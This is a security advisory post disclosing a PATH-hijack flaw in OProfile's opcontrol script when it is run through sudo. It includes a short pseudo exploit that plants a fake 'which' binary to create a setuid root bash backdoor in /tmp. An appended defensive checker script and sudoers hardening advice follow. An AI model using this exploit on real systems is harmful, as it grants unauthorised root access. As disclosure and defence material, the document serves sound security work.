Hello all,
I recently audited a box with a software called OProfile
(http://oprofile.sourceforge.net/).
"OProfile is a system-wide profiler for Linux systems, capable of profiling all
running code at low overhead. OProfile is released under the GNU GPL.
It consists of a kernel driver and a daemon for collecting sample data, and
several post-profiling tools for turning data into information.
OProfile leverages the hardware performance counters of the CPU to enable
profiling of a wide variety of interesting statistics, which can also be used
for basic time-spent profiling. All code is profiled: hardware and software
interrupt handlers, kernel modules, the kernel, shared libraries, and
applications.
OProfile is currently in alpha status; however it has proven stable over a large
number of differing configurations; it is being used on machines ranging from
laptops to 16-way NUMA-Q boxes. As always, there is no warranty."
At least one of the scripts that ships with this software (opcontrol) has a
security flaw which enables a user to run arbitrary commands.
The script itself isn't suid root *but*, to take full advantage of some of the
features the software has, a lot of administrators give 'sudo' privileges to
that script.
Whoever coded the script tried protecting it against executing binaries out of a
safe PATH by defining one on line 1416:
PATH=/usr/local/bin:/usr/local/sbin:/bin:/sbin:/usr/bin:/usr/sbin
The problem is that this script does not check where the 'which' or 'dirname'
binary is executed from on line 1413/1414.
This enables a malicious user to execute arbitrary code by using the following
pseudo 'exploit':
cat > which
#!/bin/sh
/bin/cp /bin/bash /tmp/backdoor
/bin/chmod 6755 /tmp/backdoor
^C
set PATH="."
/usr/bin/sudo /usr/local/bin/opcontrol
Vulnerable: <= oprofile-0.9.1
I contacted the developer(s) and got the following response:
"Do not trust admin privileges to unaudited code" - indeed these are words of
wisdom :o)
Apparently giving sudo to oprofile is a very common practice [Take RedHat for
instance -> http://www.redhat.com/magazine/012oct05/features/oprofile/ ].
Best regards,
+---------------------------------
| Luís Miguel Ferreira da Silva
| Unidade de Qualidade e Segurança
| Centro de Informática
| Professor Correia Araújo
| Faculdade de Engenharia da
| Universidade do Porto
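As an added defensive check, not taken from the advisory or from the OProfile project, the script below flags any external command a shell script runs through PATH lookup before the script first pins PATH, which is the ordering problem described above. The two sample scripts it writes are constructed stand-ins for opcontrol; their line numbers are illustrative.

```shell
#!/bin/sh
# Constructed sample with the risky ordering: `which`/`dirname` run via the
# caller's PATH before the script assigns its own PATH (not the real opcontrol).
make_sample() {
    cat > "$1" <<'EOF'
#!/bin/sh
SCRIPT=`which $0`
SCRIPT_DIR=`dirname $SCRIPT`
# ... other setup ...
PATH=/usr/local/bin:/usr/local/sbin:/bin:/sbin:/usr/bin:/usr/sbin
echo "$SCRIPT_DIR"
EOF
}

# Constructed hardened variant: PATH is pinned on the first executable line,
# so every later lookup resolves only inside the fixed directory list.
make_fixed() {
    cat > "$1" <<'EOF'
#!/bin/sh
PATH=/usr/local/bin:/usr/local/sbin:/bin:/sbin:/usr/bin:/usr/sbin
export PATH
SCRIPT=`which $0`
SCRIPT_DIR=`dirname $SCRIPT`
echo "$SCRIPT_DIR"
EOF
}

# Print "<lineno>:<text>" for each line that invokes an external command
# (command substitution, or a bare which/dirname/basename call) before the
# first PATH assignment. Exit 1 if any such line exists, 0 otherwise.
check_path_order() {
    awk '
        # the first PATH assignment closes the window we audit
        /^[ \t]*(export[ \t]+)?PATH=/ { exit }
        # shebang and comment lines execute nothing
        /^[ \t]*#/ { next }
        /`[a-zA-Z_]/ || /\$\([a-zA-Z_]/ || /(^|[ \t;|&])(which|dirname|basename)[ \t]/ {
            printf "%d:%s\n", NR, $0; hits++
        }
        END { exit (hits ? 1 : 0) }
    ' "$1"
}
```

Pinning PATH first in the script is only half of the fix; the sudoers `secure_path` option (with `env_reset`) makes sudo itself ignore the caller's PATH for every command it runs.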